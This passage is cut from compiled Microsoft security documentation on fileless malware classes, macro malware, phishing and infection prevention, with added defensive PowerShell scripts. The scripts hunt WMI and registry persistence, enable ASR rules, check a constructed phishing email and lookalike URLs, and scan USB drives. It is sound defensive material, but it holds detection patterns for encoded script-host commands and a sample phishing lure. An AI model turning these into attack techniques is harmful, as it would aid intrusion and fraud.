files with random extensions contain junk data that isn't usable in verifying the presence
of the threat. The files that store the registry are containers that can't be detected and
deleted if malicious content is present.
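
A read-only hunt for the two persistence patterns just described (the Type II WMI event subscription used by Poshspy and the Type III shell open verb handler plus autorun entry used by Kovter), as an added example that is not code from the Microsoft article. It assumes an elevated PowerShell session on Windows; the list of script hosts it flags and the heuristic for a "random" extension are assumptions.

```powershell
# Added example, not code from the Microsoft article: a read-only hunt for the two
# persistence patterns described above. Type II: a permanent WMI event subscription
# (Poshspy-style) in root\subscription. Type III: a shell "open" verb handler for an
# odd file extension that launches a script host (Kovter-style), plus an autorun
# entry that opens such a file. Assumes an elevated PowerShell session on Windows;
# the interpreter list and the random-extension heuristic are assumptions.
#Requires -RunAsAdministrator

function Test-ScriptHostCommand([string]$Command) {
    # Flags the interpreters the article names (mshta, wscript, powershell) and a
    # long base64 blob after -EncodedCommand, the usual way a script is hidden.
    if ([string]::IsNullOrWhiteSpace($Command)) { return $false }
    return [bool](($Command -match '\b(mshta|wscript|cscript|powershell|pwsh)(\.exe)?\b') -or
                  ($Command -match '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}'))
}

function Resolve-RefName($Ref) {
    # Binding references arrive as a CimInstance (Get-CimInstance) or as a string
    # like __EventFilter.Name="x" (Get-WmiObject); handle both.
    if ($Ref -is [Microsoft.Management.Infrastructure.CimInstance]) { return $Ref.Name }
    if ("$Ref" -match 'Name="([^"]+)"') { return $Matches[1] }
    return "$Ref"
}

function Get-WmiPersistence {
    $ns = 'root\subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue) +
                 @(Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue)
    $bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)
    foreach ($b in $bindings) {
        $fName = Resolve-RefName $b.Filter
        $cName = Resolve-RefName $b.Consumer
        $f = $filters   | Where-Object Name -eq $fName | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $cName | Select-Object -First 1
        # A CommandLineEventConsumer carries a command line; an ActiveScriptEventConsumer, script text.
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        [pscustomobject]@{
            Filter     = $fName
            Query      = $f.Query      # the WQL trigger, e.g. a timer or a logon event
            Consumer   = $cName
            Payload    = $payload
            Suspicious = Test-ScriptHostCommand $payload
        }
    }
}

function Get-SuspiciousVerbHandlers {
    # HKCR merges HKLM and HKCU classes, so a per-user handler shows up here too.
    $root = 'Registry::HKEY_CLASSES_ROOT'
    $extKeys = Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue | Where-Object PSChildName -like '.*'
    foreach ($extKey in $extKeys) {
        $ext    = $extKey.PSChildName
        $progId = $extKey.GetValue('')
        if (-not $progId) { continue }
        $cmdKey = Get-Item -LiteralPath "$root\$progId\shell\open\command" -ErrorAction SilentlyContinue
        if (-not $cmdKey) { continue }
        $command = [string]($cmdKey.GetValue(''))
        if (-not (Test-ScriptHostCommand $command)) { continue }
        [pscustomobject]@{
            Extension     = $ext
            ProgId        = $progId
            Command       = $command
            # Kovter used .bbf5590fd: a long hex-looking string, unlike .vbs or .hta.
            RandomLooking = [bool]($ext -match '^\.[0-9a-f]{7,}$')
        }
    }
}

function Get-AutorunsOpeningExtension([string[]]$Extensions) {
    # Kovter also needs an autorun entry that opens a file with the hijacked extension.
    $runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $runKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in ($props.PSObject.Properties | Where-Object Name -notlike 'PS*')) {
            foreach ($ext in $Extensions) {
                if ("$($p.Value)" -match ([regex]::Escape($ext) + '(\s|"|$)')) {
                    [pscustomobject]@{ Key = $key; Name = $p.Name; Command = $p.Value; Extension = $ext }
                }
            }
        }
    }
}

# Report only; nothing here changes the system. Triage the output before removing anything.
Get-WmiPersistence | Format-Table -AutoSize
$handlers = @(Get-SuspiciousVerbHandlers)
$handlers | Format-Table -AutoSize
if ($handlers) {
    Get-AutorunsOpeningExtension ($handlers | Where-Object RandomLooking | ForEach-Object Extension)
}
```

Legitimate handlers for .vbs, .js or .hta will appear with Suspicious set but RandomLooking clear; the autorun cross-check is limited to the random-looking extensions so those known script types do not drown the result.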

Categorizing fileless threats by infection host

Having described the broad categories, we can now dig into the details and provide a
breakdown of the infection hosts. This comprehensive classification covers the
panorama of what is usually referred to as fileless malware. It drives our efforts to
research and develop new protection features that neutralize classes of attacks and
ensure malware doesn't get the upper hand in the arms race.

Exploits
File-based (Type III: executable, Flash, Java, documents): An initial file may exploit the
operating system, the browser, the Java engine, the Flash engine, etc. to execute a
shellcode and deliver a payload in memory. While the payload is fileless, the initial entry
vector is a file.

Network-based (Type I): A network communication that takes advantage of a
vulnerability in the target machine can achieve code execution in the context of an
application or the kernel. An example is WannaCry, which exploits a previously fixed
vulnerability in the SMB protocol to deliver a backdoor within the kernel memory.

Hardware
Device-based (Type I: network card, hard disk): Devices like hard disks and network
cards require chipsets and dedicated software to function. Software residing and
running in the chipset of a device is called firmware. Although a complex task, the
firmware can be infected by malware.

CPU-based (Type I): Modern CPUs are complex and may include subsystems running
firmware for management purposes. Such firmware may be vulnerable to hijacking and
allow the execution of malicious code that would operate from within the CPU. In
December 2017, two researchers reported a vulnerability that can allow attackers to
execute code inside the Management Engine (ME) present in any modern CPU from
Intel. Meanwhile, the attacker group PLATINUM has been observed to have the
capability to use Intel's Active Management Technology (AMT) to perform invisible
network communications , bypassing the installed operating system. ME and AMT are
essentially autonomous micro-computers that live inside the CPU and that operate at a
very low level. Because these technologies' purpose is to provide remote manageability,
they have direct access to hardware, are independent of the operating system, and can
run even if the computer is turned off.
Besides being vulnerable at the firmware level, CPUs could be manufactured with
backdoors inserted directly in the hardware circuitry. This attack has been researched
and proved possible in the past. It has been reported that certain models of x86
processors contain a secondary embedded RISC-like CPU core that can effectively
provide a backdoor through which regular applications can gain privileged execution.

USB-based (Type I): USB devices of all kinds can be reprogrammed with malicious
firmware capable of interacting with the operating system in nefarious ways. For
example, the BadUSB technique allows a reprogrammed USB stick to act as a
keyboard that sends commands to machines via keystrokes, or as a network card that
can redirect traffic at will.

BIOS-based (Type I): A BIOS is a firmware running inside a chipset. It executes when a
machine is powered on, initializes the hardware, and then transfers control to the boot
sector. The BIOS is an important component that operates at a low level and executes
before the boot sector. It's possible to reprogram the BIOS firmware with malicious
code, as has happened in the past with the Mebromi rootkit .

Hypervisor-based (Type I): Modern CPUs provide hardware hypervisor support, allowing
the operating system to create robust virtual machines. A virtual machine runs in a
confined, simulated environment, and is in theory unaware of the emulation. A malware
taking over a machine may implement a small hypervisor to hide itself outside of the
realm of the running operating system. Malware of this kind has been theorized in the
past, and eventually real hypervisor rootkits have been observed , although few are
known to date.

Execution and injection

File-based (Type III: executables, DLLs, LNK files, scheduled tasks): This is the standard
execution vector. A simple executable can be launched as a first-stage malware to run
an additional payload in memory, or injected into other legitimate running processes.

Macro-based (Type III: Office documents): The VBA language is a flexible and powerful
tool designed to automate editing tasks and add dynamic functionality to documents.
As such, it can be abused by attackers to carry out malicious operations like decoding,
running, or injecting an executable payload, or even implementing an entire
ransomware, like in the case of qkG . Macros are executed within the context of an
Office process (e.g., Winword.exe) and implemented in a scripting language. There's no
binary executable that an antivirus can inspect. While Office apps require explicit
consent from the user to execute macros from a document, attackers use social
engineering techniques to trick users into allowing macros to execute.

Script-based (Type II: file, service, registry, WMI repo, shell): The JavaScript, VBScript, and
PowerShell scripting languages are available by default on Windows platforms. Scripts
have the same advantages as macros, they are textual files (not binary executables) and
run within the context of the interpreter (like wscript.exe, powershell.exe), which is a
clean and legitimate component. Scripts are versatile and can be run from a file (by
double-clicking them) or executed directly on the command line of an interpreter.
Running on the command line allows malware to encode malicious scripts as autostart
services inside autorun registry keys or as WMI event subscriptions in the WMI
repo. Furthermore, an attacker who has gained access to an infected machine may input
the script on the command prompt.

Disk-based (Type II: Boot Record): The Boot Record is the first sector of a disk or volume,
and contains executable code required to start the boot process of the operating
system. Threats like Petya are capable of infecting the Boot Record by overwriting it
with malicious code. When the machine is booted, the malware immediately gains
control. The Boot Record resides outside the file system, but it's accessible by the
operating system. Modern antivirus products have the capability to scan and restore it.

Defeating fileless malware

At Microsoft, we actively monitor the security landscape to identify new threat trends
and develop solutions to mitigate classes of threats. We instrument durable protections
that are effective against a wide range of threats. Through AntiMalware Scan Interface
(AMSI), behavior monitoring, memory scanning, and boot sector protection, Microsoft
Defender for Endpoint can inspect fileless threats even with heavy obfuscation. Machine
learning technologies in the cloud allow us to scale these protections against new and
emerging threats.

To learn more, read: Out of sight but not invisible: Defeating fileless malware with
behavior monitoring, AMSI, and next-gen AV

Additional resources and information

Learn how to deploy threat protection capabilities across Microsoft 365 E5.

Macro malware
Article • 02/28/2024

Macros are a powerful way to automate common tasks in Microsoft Office and can
make people more productive. However, macro malware uses this functionality to infect
your device.

How macro malware works

Macro malware hides in Microsoft Office files and is delivered as email attachments or
inside ZIP files. These files use names that are intended to entice or scare people into
opening them. They often look like invoices, receipts, legal documents, and more.

Macro malware was fairly common several years ago because macros ran automatically
whenever a document was opened. In recent versions of Microsoft Office, macros are
disabled by default. Now, malware authors need to convince users to turn on macros so
that their malware can run. They try to scare users by showing fake warnings when a
malicious document is opened.

We've seen macro malware download threats from the following families:

Ransom:MSIL/Swappa
Ransom:Win32/Teerac
TrojanDownloader:Win32/Chanitor
TrojanSpy:Win32/Ursnif
Win32/Fynloski
Worm:Win32/Gamarue

How to protect against macro malware

Make sure macros are disabled in your Microsoft Office applications. In enterprises,
IT admins set the default setting for macros:
Enable or disable macros in Office documents

Don't open suspicious emails or suspicious attachments.

Delete any emails from unknown people or with suspicious content. Spam emails
are the main way macro malware spreads.

Enterprises can prevent macro malware from running executable content using
ASR rules

For more tips on protecting yourself from suspicious emails, see phishing.

For more general tips, see prevent malware infection.
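
Enabling the attack surface reduction rules that stop Office macros from producing or launching executable content, in audit mode first, and then reviewing the rule events Defender logs, as an added example that is not code from the Microsoft article. It assumes an elevated PowerShell session with the Defender module; the rule GUIDs are the published identifiers for these rules and should be checked against the ASR rules reference before deployment.

```powershell
# Added example, not code from the Microsoft article: enable the ASR rules that
# keep Office macros from creating executable content, launching child processes,
# or injecting into other processes. Start in audit mode, then read the Defender
# operational log to see what the rules would have blocked.
# Assumes an elevated session with the Defender module. The GUIDs are the
# published rule identifiers; verify them against the ASR rules reference.
#Requires -RunAsAdministrator

$OfficeAsrRules = @{
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
}

function Set-OfficeAsrRules {
    # Add-MpPreference appends to the configured rule list instead of replacing it,
    # so rules deployed by other means are left alone.
    param([ValidateSet('Enabled', 'AuditMode', 'Disabled')][string]$Action = 'AuditMode')
    foreach ($id in $OfficeAsrRules.Keys) {
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $Action
    }
    # Ids and Actions are parallel arrays; pair them up for review.
    $pref = Get-MpPreference
    for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
        $ruleId = $pref.AttackSurfaceReductionRules_Ids[$i]
        [pscustomobject]@{
            RuleId = $ruleId
            Name   = $OfficeAsrRules[$ruleId]      # $null for rules not in the table above
            Action = $pref.AttackSurfaceReductionRules_Actions[$i]
        }
    }
}

function Get-AsrRuleEvents {
    # Event 1121 = rule fired in block mode, 1122 = rule fired in audit mode.
    param([int]$Days = 7)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1121, 1122
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
                      @{ n = 'Mode'; e = { if ($_.Id -eq 1121) { 'Block' } else { 'Audit' } } },
                      Message
}

Set-OfficeAsrRules -Action AuditMode   # observe first
Get-AsrRuleEvents -Days 7              # review what the rules would have blocked
```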



Phishing trends and techniques
Article • 02/28/2024

Phishing attacks are scams that often use social engineering bait or lure content.
Legitimate-looking communication, usually email, that links to a phishing site is one of
the most common methods used in phishing attacks. The phishing site typically mimics
sign in pages that require users to input credentials and account information. The
phishing site then captures the sensitive information as soon as the user provides it,
giving attackers access to the information.

Below are some of the most common phishing techniques attackers will employ to try to
steal information or gain access to your devices.

Invoice phishing
In this scam, the attacker attempts to lure you with an email stating that you have an
outstanding invoice from a known vendor or company. They then provide a link for you
to access and pay your invoice. When you access the site, the attacker is poised to steal
your personal information and funds.

Payment/delivery scam
You're asked to provide a credit card or other personal information so that your
payment information can be updated with a commonly known vendor or supplier. The
update is requested so that you can take delivery of your ordered goods. Generally, you
may be familiar with the company and have likely done business with them in the past.
However, you aren't aware of any items you have recently purchased from them.

Tax-themed phishing scams

A common IRS phishing scam is receiving an urgent email letter indicating that you owe
money to the IRS. Often the email threatens legal action if you don't access the site in a
timely manner and pay your taxes. When you access the site, the attackers can steal
your personal credit card or bank information and drain your accounts.

Downloads
An attacker sends a fraudulent email requesting you to open or download a document
attachment, such as a PDF. The attachment often contains a message asking you to sign
in to another site, such as email or file sharing websites, to open the document. When
you access these phishing sites using your sign-in credentials, the attacker now has
access to your information and can gain additional personal information about you.

Phishing emails that deliver other threats

Phishing emails are often effective, so attackers sometimes use them to distribute
ransomware through links or attachments in emails. When run, the ransomware encrypts
files and displays a ransom note, which asks you to pay a sum of money to access to
your files.

We have also seen phishing emails that have links to tech support scam websites. These
websites use various scare tactics to trick you into calling hotlines and paying for
unnecessary "technical support services" that supposedly fix contrived device, platform,
or software problems.

Spear phishing
Spear phishing is a targeted phishing attack that involves highly customized lure
content. Attackers will typically do reconnaissance work by surveying social media and
other information sources about their intended target.

Spear phishing may involve tricking you into logging into fake sites and divulging
credentials. It may also lure you into opening documents by clicking on links that
automatically install malware. With this malware in place, attackers can remotely
manipulate the infected computer.

The implanted malware serves as the point of entry for a more sophisticated attack,
known as an advanced persistent threat (APT). APTs are designed to establish control
and steal data over extended periods. Attackers may try to deploy more covert hacking
tools, move laterally to other computers, compromise or create privileged accounts, and
regularly exfiltrate information from compromised networks.

Whaling
Whaling is a form of phishing directed at high-level or senior executives within specific
companies to gain access to their credentials and/or bank information. The content of
the email may be written as a legal subpoena, customer complaint, or other executive
issue. This type of attack can also lead to an APT attack within an organization.

Business email compromise

Business email compromise (BEC) is a sophisticated scam that targets businesses who
frequently work with foreign suppliers or do money wire transfers. One of the most
common schemes used by BEC attackers involves gaining access to a company's
network through a spear phishing attack. The attacker creates a domain similar to the
company they're targeting, or spoofs their email to scam users into releasing personal
account information for money transfers.

More information about phishing attacks

For information on the latest phishing attacks, techniques, and trends, you can read
these entries on the Microsoft Security blog :

Phishers unleash simple but effective social engineering techniques using PDF
attachments
Tax themed phishing and malware attacks proliferate during the tax filing season
Phishing like emails lead to tech support scam



How to protect against phishing attacks
Article • 02/28/2024

Phishing attacks attempt to steal sensitive information through emails, websites, text
messages, or other forms of electronic communication. They try to look like official
communication from legitimate companies or individuals.

Cybercriminals often attempt to steal usernames, passwords, credit card details, bank
account information, or other credentials. They use stolen information for malicious
purposes, such as hacking, identity theft, or stealing money directly from bank accounts
and credit cards. The information can also be sold in cybercriminal underground
markets.

Social engineering attacks are designed to take advantage of a user's possible lapse in
decision-making. Be aware and never provide sensitive or personal information through
email or unknown websites, or over the phone. Remember, phishing emails are
designed to appear legitimate.

Learn the signs of a phishing scam

The best protection is awareness and education. Don't open attachments or links in
unsolicited emails, even if the emails came from a recognized source. If the email is
unexpected, be wary about opening the attachment and verify the URL.

Enterprises should educate and train their employees to be wary of any communication
that requests personal or financial information. They should also instruct employees to
report the threat to the company's security operations team immediately.

Here are several telltale signs of a phishing scam:

The links or URLs provided in emails are not pointing to the correct location or
are pointing to a third-party site not affiliated with the sender of the email. For
example, in the image below the URL provided doesn't match the URL that you'll
be taken to.

There's a request for personal information such as social security numbers or
bank or financial information. Official communications won't generally request
personal information from you in the form of an email.

The sender's address is altered so that it looks similar to a legitimate email address
but has added numbers or changed letters.

The message is unexpected and unsolicited. If you suddenly receive an email from
an entity or a person you rarely deal with, consider this email suspect.

The message or the attachment asks you to enable macros, adjust security
settings, or install applications. Normal emails won't ask you to do this.

The message contains errors. Legitimate corporate messages are less likely to have
typographic or grammatical errors or contain wrong information.

The sender address doesn't match the signature on the message itself. For
example, an email is purported to be from Mary of Contoso Corp, but the sender
address is john@example.com.

There are multiple recipients in the "To" field and they appear to be random
addresses. Corporate messages are normally sent directly to individual recipients.

The greeting on the message itself doesn't personally address you. Apart from
messages that mistakenly address a different person, greetings that misuse your
name or pull your name directly from your email address tend to be malicious.

The website looks familiar but there are inconsistencies or things that aren't quite
right. Warning signs include outdated logos, typos, or requests for additional
information that legitimate sign-in websites don't ask for.

The page that opens is not a live page, but rather an image that is designed to
look like the site you're familiar with. A pop-up might appear that requests
credentials.

If in doubt, contact the business by known channels to verify if any suspicious emails are
in fact legitimate.
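Several of the signs above can be checked mechanically before a person reads the message. The following is an added example written for this section, not Microsoft's code and not part of the original page: a PowerShell function that reads one raw message and reports the sender, Reply-To, link, greeting and "enable macros" mismatches the list describes. The sample message, the brand-to-domain table and the keyword patterns are constructed for the demo and are assumptions, not product data.

```powershell
# Added example (not from the Microsoft page). Assumption: you keep a small table
# of brand words and the domain each brand legitimately mails from.
$KnownBrands = @{ 'contoso' = 'contoso.com' }

# Constructed sample message: spoofed display name, off-brand sender domain,
# mismatched Reply-To, a link whose text and target disagree, a generic greeting,
# and a request to enable macros.
$SampleMail = @'
From: "Contoso Billing" <billing@mail-notify-center.net>
Reply-To: refunds@contoso-helpdesk.org
To: you@example.com
Subject: Your invoice is overdue

Dear customer,
Please enable macros in the attached document and confirm at
<a href="http://contoso-helpdesk.org/verify">https://contoso.com/account</a>.
Regards,
Mary, Contoso Corp
'@

function Test-PhishingIndicators {
    param([string]$RawMail, [hashtable]$Brands)
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Sender address: the display name claims one company, the address is elsewhere
    $fromDomain = $null
    if ($RawMail -match '(?m)^From:\s*"?([^"<]*?)"?\s*<[^@>]+@([^>]+)>') {
        $display = $Matches[1]; $fromDomain = $Matches[2].ToLowerInvariant()
        foreach ($brand in $Brands.Keys) {
            $legit = $Brands[$brand]
            if ($display -match "(?i)\b$brand\b" -and
                $fromDomain -ne $legit -and -not $fromDomain.EndsWith(".$legit")) {
                $findings.Add("Display name mentions '$brand' but the address is at '$fromDomain'")
            }
        }
    }

    # 2. Reply-To routes answers somewhere other than the sender's domain
    if ($fromDomain -and $RawMail -match '(?m)^Reply-To:\s*\S+@(\S+)') {
        $replyDomain = $Matches[1].ToLowerInvariant()
        if ($replyDomain -ne $fromDomain) {
            $findings.Add("Reply-To goes to '$replyDomain', not '$fromDomain'")
        }
    }

    # 3. Link text shows one host, the href points at another
    foreach ($m in [regex]::Matches($RawMail, '<a\s+href="([^"]+)"[^>]*>([^<]+)</a>')) {
        $text = $m.Groups[2].Value.Trim()
        if ($text -match '^https?://') {
            $shown  = ([uri]$text).Host
            $actual = ([uri]$m.Groups[1].Value).Host
            if ($shown -ne $actual) { $findings.Add("Link text shows '$shown' but points to '$actual'") }
        }
    }

    # 4. Generic greeting, and requests to change security settings
    if ($RawMail -match '(?im)^dear (user|customer|client|member)\b') {
        $findings.Add('Generic greeting instead of your name')
    }
    if ($RawMail -match '(?i)enable (macros|content|editing)') {
        $findings.Add('Asks you to enable macros or content')
    }
    return $findings
}

$result = Test-PhishingIndicators -RawMail $SampleMail -Brands $KnownBrands
if ($result.Count -eq 0) { 'No indicators found' }
else { $result | ForEach-Object { "[!] $_" } }
```

Each check maps to one bullet in the list; none of them is proof on its own, which is why the function accumulates findings rather than returning a verdict, and why the page's advice to verify through a known channel still applies when the list is empty.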

Software solutions for organizations


Microsoft Edge and Windows Defender Application Guard offer protection from
the increasing threat of targeted attacks using Microsoft's Hyper-V virtualization
technology. If a browsed website is deemed untrusted, it opens inside an isolated
Hyper-V container that is separated from the rest of the device and your network,
so the site can't reach your enterprise data.

Microsoft Exchange Online Protection (EOP) offers enterprise-class reliability and
protection against spam and malware, while maintaining access to email during
and after emergencies. Using various layers of filtering, EOP provides controls
such as bulk mail and international spam filtering that improve your protection.

Use Microsoft Defender for Office 365 to help protect your email, files, and
online storage against malware. It offers holistic protection in Microsoft Teams,
Word, Excel, PowerPoint, Visio, SharePoint Online, and OneDrive for Business. By
protecting against unsafe attachments and expanding protection against malicious
links, it complements the security features of Exchange Online Protection to
provide better zero-day protection.

What to do if you've been a victim of a phishing scam
If you think you've been a victim of a phishing attack:

1. Contact your IT admin if you are on a work computer
2. Immediately change all passwords associated with the accounts
3. Report any fraudulent activity to your bank and credit card company

Reporting spam
Outlook.com: If you receive a suspicious email message that asks for personal
information, select the check box next to the message in your Outlook inbox.
Select the arrow next to Junk, and then select Phishing.

Microsoft Office Outlook: While in the suspicious message, select Report message
from the ribbon, and then select Phishing.

Microsoft 365: Use the Submissions portal in Microsoft 365 Defender to submit
the junk or phishing sample to Microsoft for analysis. For more information, see
How do I report a suspicious email or file to Microsoft?.

Anti-Phishing Working Group: phishing-report@us-cert.gov. The group uses
reports generated from emails sent to fight phishing scams and hackers. ISPs,
security vendors, financial institutions, and law enforcement agencies are involved.

If you're on a suspicious website


Microsoft Edge: While you're on a suspicious site, select the More (...) icon > Help
and feedback > Report Unsafe site. Follow the instructions on the webpage that
displays to report the website.

Internet Explorer: While you're on a suspicious site, select the gear icon, point to
Safety, and then select Report Unsafe Website. Follow the instructions on the
webpage that displays to report the website.

More information about phishing attacks


Protect yourself from phishing
Phishing trends



Prevent malware infection
Article • 02/28/2024

Attackers are always looking for new ways to infect computers. Follow the tips below to
stay protected and minimize threats to your data and accounts.

Keep software up to date


Exploits typically use vulnerabilities in software. It's important to keep your software,
apps, and operating systems up to date.

To keep Microsoft software up to date, ensure that automatic Microsoft Updates are
enabled. Also, upgrade to the latest version of Windows to benefit from the latest built-
in security enhancements.

Be wary of links and attachments


Email, SMS messages, Microsoft Teams chat, and other messaging tools are a few of the
most common ways attackers can infect devices. Attachments or links in messages can
open malware directly or can stealthily trigger a download.

Use an email service that provides protection against malicious attachments, links,
and abusive senders. Microsoft Office 365 has built-in anti-malware, link
protection, and spam filtering. Microsoft Outlook contains additional security
configurations and settings you can enable. See Advanced Outlook.com security
for Microsoft 365 subscribers.

Some attackers try to get you to share information about your login information,
passwords, and more. Be aware of some of the common tactics attackers use to try
to trick you. For more information, see phishing.

Watch out for malicious or compromised websites
When you visit malicious or compromised sites, your device can get infected with
malware automatically, or you can get tricked into downloading and installing malware.
See exploits and exploit kits for an example of how some of these sites can automatically
install malware on visiting computers.

To identify potentially harmful websites, keep the following in mind:


The initial part (domain) of a website address should represent the company that
owns the site you're visiting. Check the domain for misspellings. For example,
malicious sites commonly use domain names that swap the letter O with a zero (0)
or the letters L and I with a one (1). If example.com is spelled examp1e.com, the site
you're visiting is suspect.

Sites that aggressively open popups and display misleading buttons often trick
users into accepting content through constant popups or mislabeled buttons.

To block malicious websites, use a modern web browser like Microsoft Edge that
identifies phishing and malware websites and checks downloads for malware.

If you encounter an unsafe site, click More [...] > Send feedback on Microsoft Edge. You
can also report unsafe sites directly to Microsoft.
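As an added example (not code from the original page), the following PowerShell script applies the domain check above to a list of URLs. It folds the letter-for-digit swaps the text mentions, and goes one step further than the text by also catching a trusted name that appears as a subdomain of, or hyphenated inside, a different registrable domain, which is the "initial part (domain)" point in practice. The trusted domains and test URLs are constructed; the registrable-domain logic is deliberately naive (last two labels) and would need the Public Suffix List before production use.

```powershell
# Added example (not from the Microsoft page). Assumption: the trusted domain
# list below is yours; the URLs are constructed to exercise each case.
$TrustedDomains = @('example.com', 'contoso.com')

$TestUrls = @(
    'https://example.com/login',                      # genuine
    'https://accounts.example.com/login',             # genuine subdomain
    'https://examp1e.com/login',                      # 1 in place of l
    'https://c0ntoso.com/verify',                     # 0 in place of o
    'https://example.com.account-verify.net/login',   # brand used as a subdomain elsewhere
    'https://example-com-support.net/help'            # brand embedded in another domain
)

function Get-RegistrableDomain {
    param([string]$HostName)
    # Naive: the last two labels. Good enough for .com/.net; use the Public
    # Suffix List for co.uk-style suffixes.
    $labels = $HostName.ToLowerInvariant().Split('.')
    if ($labels.Count -lt 2) { return $HostName.ToLowerInvariant() }
    return ($labels[-2..-1] -join '.')
}

function Get-FoldedLabel {
    param([string]$Text)
    # Collapse the substitutions the page names (plus a few common ones) so that
    # examp1e and example compare equal. Two-character folds run first.
    $t = $Text.ToLowerInvariant()
    foreach ($pair in @(@('rn','m'), @('vv','w'), @('0','o'), @('1','l'), @('i','l'), @('3','e'), @('5','s'))) {
        $t = $t.Replace($pair[0], $pair[1])
    }
    return $t
}

function Test-LookalikeUrl {
    param([string]$Url, [string[]]$Trusted)
    $hostName = ([uri]$Url).Host.ToLowerInvariant()
    $reg      = Get-RegistrableDomain $hostName
    if ($Trusted -contains $reg) { return "OK        $hostName (registrable domain $reg is trusted)" }
    foreach ($t in $Trusted) {
        $brand = $t.Split('.')[0]
        if ((Get-FoldedLabel $reg) -eq (Get-FoldedLabel $t)) {
            return "LOOKALIKE $hostName (registrable domain $reg resembles $t)"
        }
        if ($hostName -like "*$t*" -or $reg -like "*$brand*") {
            return "SUSPECT   $hostName (trusted name '$t' appears, but the registrable domain is $reg)"
        }
    }
    return "UNKNOWN   $hostName (not trusted, not a known lookalike)"
}

$TestUrls | ForEach-Object { Test-LookalikeUrl -Url $_ -Trusted $TrustedDomains }
```

The important design point is that the verdict is made on the registrable domain, not on whether a familiar word appears anywhere in the address: "example.com" at the start of a hostname means nothing if the registrable domain is someone else's.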

Pirated material on compromised websites


Using pirated content isn't only illegal, it can also expose your device to malware. Sites
that offer pirated software and media are also often used to distribute malware when
the site is visited. Sometimes pirated software is bundled with malware and other
unwanted software when downloaded, including intrusive browser plugins and adware.

Users don't openly discuss visits to these sites, so any untoward experiences are more
likely to stay unreported.

To stay safe, download movies, music, and apps from official publisher websites or
stores.

Don't attach unfamiliar removable drives


Some types of malware spread by copying themselves to USB flash drives or other
removable drives. There are malicious individuals that intentionally prepare and
distribute infected drives by leaving them in public places for unsuspecting individuals.

Only use removable drives that you're familiar with or that come from a trusted source.
If a drive has been used in publicly accessible devices, like computers in a café or a
library, make sure you have antimalware running on your computer before you use the
drive. Avoid opening unfamiliar files you find on suspect drives, including Office and
PDF documents and executable files.
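As an added example, not from Microsoft's page: from an elevated PowerShell session you can confirm the antimalware posture the paragraph calls for before a drive is opened, keep AutoRun switched off so nothing on the drive launches itself, and scan only that drive before touching its files. The drive letter is an assumption; the registry value and the Defender cmdlets are documented Windows ones.

```powershell
# Added example (not from the Microsoft page). Run elevated on Windows 10/11.
$DriveLetter = 'E:'   # assumption: the removable drive you are about to use

# 1. Is Microsoft Defender Antivirus running, with current signatures?
$status = Get-MpComputerStatus
[pscustomobject]@{
    AntivirusEnabled          = $status.AntivirusEnabled
    RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
    SignatureAgeDays          = (New-TimeSpan -Start $status.AntivirusSignatureLastUpdated -End (Get-Date)).Days
} | Format-List
if (-not $status.RealTimeProtectionEnabled) {
    Write-Warning 'Real-time protection is off; fix that before plugging in the drive.'
}

# 2. Make sure removable drives are not excluded from scans
#    ($true would skip removable drives during full scans)
if ((Get-MpPreference).DisableRemovableDriveScanning) {
    Set-MpPreference -DisableRemovableDriveScanning $false
}

# 3. Keep AutoRun off for every drive type (0xFF = all types) so nothing on the
#    drive executes just because it was plugged in
$policy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
if (-not (Test-Path $policy)) { New-Item -Path $policy -Force | Out-Null }
$current = (Get-ItemProperty -Path $policy -Name NoDriveTypeAutoRun -ErrorAction SilentlyContinue).NoDriveTypeAutoRun
if ($current -ne 0xFF) {
    Set-ItemProperty -Path $policy -Name NoDriveTypeAutoRun -Value 0xFF -Type DWord
}

# 4. Scan just that drive before opening anything on it, then list anything found there
if (Test-Path "$DriveLetter\") {
    Start-MpScan -ScanType CustomScan -ScanPath "$DriveLetter\"
    Get-MpThreatDetection |
        Where-Object { $_.Resources -match [regex]::Escape($DriveLetter) } |
        Select-Object ThreatID, InitialDetectionTime, Resources
}
```

The AutoRun policy is the part people forget: real-time protection catches known malware when it runs, but keeping AutoRun off removes the "runs automatically" step entirely, which also covers the Office and PDF lures the paragraph mentions, since those still need a user to open them.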

Use a non-administrator account


Whether launched inadvertently by a user or automatically, most malware runs with
the same privileges as the active user. This means that by limiting account privileges,
you can prevent malware from making consequential changes to a device.

By default, Windows uses User Account Control (UAC) to provide automatic, granular
control of privileges—it temporarily restricts privileges and prompts the active user
every time an application attempts to make potentially consequential changes to the
system. Although UAC helps limit the privileges of admin users, users can override this
restriction when prompted. As a result, it's quite easy for an admin user to inadvertently
allow malware to run.

To help ensure that everyday activities don't result in malware infection and other
potentially catastrophic changes, it's recommended that you use a non-administrator
account for regular use. By using a non-administrator account, you can prevent
installation of unauthorized apps and prevent inadvertent changes to system settings.
Avoid browsing the web or checking email using an account with administrator
privileges.

